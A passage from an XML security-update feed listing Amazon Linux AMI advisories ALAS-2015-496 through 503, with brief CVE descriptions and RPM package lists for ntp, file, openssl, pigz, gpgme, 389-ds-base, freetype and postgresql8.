arch="i686"><filename>Packages/glibc-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.139.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.139.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-496</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-496: medium priority package update for ntp</title><issued date="2015-03-23 08:31:00" /><updated date="2015-03-23 08:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9298:
1184572:
CVE-2014-9298 ntp: drop packets with source address ::1
CVE-2014-9297:
1184573:
CVE-2014-9297 ntp: vallen in extension fields are not validated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9297" title="" id="CVE-2014-9297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9298" title="" id="CVE-2014-9298" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-27.23.amzn1.noarch.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-27.23.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-27.23.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-27.23.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-27.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-497</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-497: medium priority package update for file</title><issued date="2015-03-23 08:32:00" /><updated 
date="2015-03-23 09:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9653:
1190116:
CVE-2014-9653 file: malformed elf file causes access to uninitialized memory
CVE-2014-9621:
The ELF parser in file 5.16 through 5.21 allows remote attackers to cause a denial of service via a long string.
1180642:
CVE-2014-9621 file: limit string printing to 100 chars
CVE-2014-9620:
The ELF parser in file 5.08 through 5.21 allows remote attackers to cause a denial of service via a large number of notes.
1180639:
CVE-2014-9620 file: limit the number of ELF notes processed
CVE-2014-8117:
softmagic.c in file before 5.21 does not properly limit recursion, which allows remote attackers to cause a denial of service (CPU consumption or crash) via unspecified vectors.
1174606:
CVE-2014-8117 file: denial of service issue (resource consumption)
CVE-2014-8116:
The ELF parser (readelf.c) in file before 5.21 allows remote attackers to cause a denial of service (CPU consumption or crash) via a large number of (1) program or (2) section headers or (3) invalid capabilities.
1171580:
CVE-2014-8116 file: multiple denial of service issues (resource consumption)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116" title="" id="CVE-2014-8116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117" title="" id="CVE-2014-8117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620" title="" id="CVE-2014-9620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621" title="" id="CVE-2014-9621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9653" title="" id="CVE-2014-9653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-devel" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.22" release="2.29.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.22-2.29.amzn1.noarch.rpm</filename></package><package name="file-debuginfo" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.22" release="2.29.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.22-2.29.amzn1.noarch.rpm</filename></package><package name="file" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.22" release="2.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-debuginfo-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-static" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.22-2.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-498</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-498: medium priority package update for openssl</title><issued date="2015-03-23 13:42:00" /><updated date="2015-03-23 13:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0293:
A denial of service flaw was found in the way OpenSSL handled certain SSLv2 messages. A malicious client could send a specially crafted SSLv2 CLIENT-MASTER-KEY message that would cause an OpenSSL server that both supports SSLv2 and enables EXPORT-grade cipher suites to crash.
1202404:
CVE-2015-0293 openssl: assertion failure in SSLv2 servers
CVE-2015-0289:
A null-pointer dereference was found in the way OpenSSL handled certain PKCS#7 blobs. An attacker could cause OpenSSL to crash when applications verify, decrypt or parse these ASN.1 encoded PKCS#7 blobs. OpenSSL clients and servers are not affected.
1202384:
CVE-2015-0289 openssl: PKCS7 NULL pointer dereference
CVE-2015-0288:
A NULL pointer dereference flaw was found in OpenSSL's x509 certificate handling implementation. A remote attacker could use this flaw to crash an OpenSSL server using an invalid certificate key.
1202418:
CVE-2015-0288 openssl: X509_to_X509_REQ NULL pointer dereference
CVE-2015-0287:
An out-of-bounds write flaw was found in the way OpenSSL reused certain ASN.1 structures. A remote attacker could use a specially crafted ASN.1 structure that, when parsed by an application, would cause that application to crash.
1202380:
CVE-2015-0287 openssl: ASN.1 structure reuse memory corruption
CVE-2015-0286:
A flaw was found in the ASN (Abstract Syntax Notation) parsing code of OpenSSL. An attacker could present a specially crafted certificate which, when verified by an OpenSSL client or server, could cause it to crash.
1202366:
CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()
CVE-2015-0209:
A use-after-free flaw was found in the way OpenSSL imported certain Elliptic Curve private keys. An attacker could use this flaw to crash OpenSSL if a specially crafted certificate was imported.
1196737:
CVE-2015-0209 openssl: use-after-free on invalid EC private key import
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209" title="" id="CVE-2015-0209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286" title="" id="CVE-2015-0286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287" title="" id="CVE-2015-0287" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288" title="" id="CVE-2015-0288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289" title="" id="CVE-2015-0289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293" title="" id="CVE-2015-0293" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.84.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-499</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-499: low priority package update for pigz</title><issued date="2015-04-01 13:32:00" /><updated date="2015-04-01 17:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1191:
Multiple directory traversal vulnerabilities in pigz 2.3.1 allow remote attackers to write to arbitrary files via a (1) full pathname or (2) .. (dot dot) in an archive.
1181045:
CVE-2015-1191 pigz: directory traversal vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1191" title="" id="CVE-2015-1191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pigz" version="2.3.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/pigz-2.3.3-1.6.amzn1.x86_64.rpm</filename></package><package name="pigz-debuginfo" version="2.3.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/pigz-debuginfo-2.3.3-1.6.amzn1.x86_64.rpm</filename></package><package name="pigz" version="2.3.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/pigz-2.3.3-1.6.amzn1.i686.rpm</filename></package><package name="pigz-debuginfo" version="2.3.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/pigz-debuginfo-2.3.3-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-500</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-500: low priority package update for gpgme</title><issued date="2015-04-01 13:32:00" /><updated date="2015-04-01 17:02:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3564:
Multiple heap-based buffer overflows in the status_handler function in (1) engine-gpgsm.c and (2) engine-uiserver.c in GPGME before 1.5.1 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to "different line lengths in a specific order."
1113267:
CVE-2014-3564 gpgme: heap-based buffer overflow in gpgsm status handler
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3564" title="" id="CVE-2014-3564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gpgme-devel" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-devel-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme-debuginfo" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-debuginfo-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme" version="1.4.3" release="5.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gpgme-1.4.3-5.15.amzn1.x86_64.rpm</filename></package><package name="gpgme-devel" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-devel-1.4.3-5.15.amzn1.i686.rpm</filename></package><package name="gpgme" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-1.4.3-5.15.amzn1.i686.rpm</filename></package><package name="gpgme-debuginfo" version="1.4.3" release="5.15.amzn1" epoch="0" arch="i686"><filename>Packages/gpgme-debuginfo-1.4.3-5.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-501</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-501: important priority package update for 389-ds-base</title><issued date="2015-04-01 13:49:00" /><updated date="2015-04-01 17:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8112:
It was found that when the nsslapd-unhashed-pw-switch 389 Directory Server configuration option was set to "off", it did not prevent the writing of unhashed passwords into the Changelog. This could potentially allow an authenticated user able to access the Changelog to read sensitive information.
1172729:
CVE-2014-8112 389-ds-base: password hashing bypassed when "nsslapd-unhashed-pw-switch" is set to off
CVE-2014-8105:
An information disclosure flaw was found in the way the 389 Directory Server stored information in the Changelog that is exposed via the 'cn=changelog' LDAP sub-tree. An unauthenticated user could in certain cases use this flaw to read data from the Changelog, which could include sensitive information such as plain-text passwords.
1167858:
CVE-2014-8105 389-ds-base: information disclosure through 'cn=changelog' subtree
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8105" title="" id="CVE-2014-8105" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8112" title="" id="CVE-2014-8112" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.27-1.27.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.27-1.27.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.27-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2015-502</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-502: important priority package update for freetype</title><issued date="2015-04-01 13:56:00" /><updated date="2015-04-01 17:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9675:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9674:
Multiple integer overflow flaws and an integer signedness flaw, leading to heap-based buffer overflows, were found in the way FreeType handled Mac fonts. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2014-9673:
Multiple integer overflow flaws and an integer signedness flaw, leading to heap-based buffer overflows, were found in the way FreeType handled Mac fonts. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2014-9671:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9670:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9669:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9667:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9664:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9663:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9661:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9660:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9658:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
CVE-2014-9657:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, possibly, disclose a portion of the application memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9657" title="" id="CVE-2014-9657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9658" title="" id="CVE-2014-9658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9660" title="" id="CVE-2014-9660" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9661" title="" id="CVE-2014-9661" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9663" title="" id="CVE-2014-9663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9664" title="" id="CVE-2014-9664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9667" title="" id="CVE-2014-9667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9669" title="" id="CVE-2014-9669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9670" title="" id="CVE-2014-9670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9671" title="" id="CVE-2014-9671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9673" title="" id="CVE-2014-9673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9674" title="" id="CVE-2014-9674" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9675" title="" id="CVE-2014-9675" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0696.html" title="" id="RHSA-2015:0696" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-debuginfo" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" 
version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="15.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-15.14.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-15.14.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="15.14.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-15.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-503</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-503: medium priority package update for postgresql8</title><issued date="2015-04-15 21:47:00" /><updated date="2015-04-15 22:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in the way PostgreSQL handled certain errors that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
CVE-2015-0243:
A stack-based buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2015-0241:
A buffer overflow flaw was found in the way PostgreSQL handled certain numeric formatting. An authenticated database user could use a specially crafted timestamp formatting template to cause PostgreSQL to crash or, under certain conditions, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-8161:
An information leak flaw was found in the way the PostgreSQL database server handled certain error messages. An authenticated database user could possibly obtain the results of a query they did not have privileges to execute by observing the constraint violation error messages produced when the query was executed.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8161" title="" id="CVE-2014-8161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0241" title="" id="CVE-2015-0241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0750.html" title="" id="RHSA-2015:0750" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-debuginfo" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="2.48.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="2.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-2.48.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="2.48.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-2.48.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="2.48.amzn1" epoch="0" 
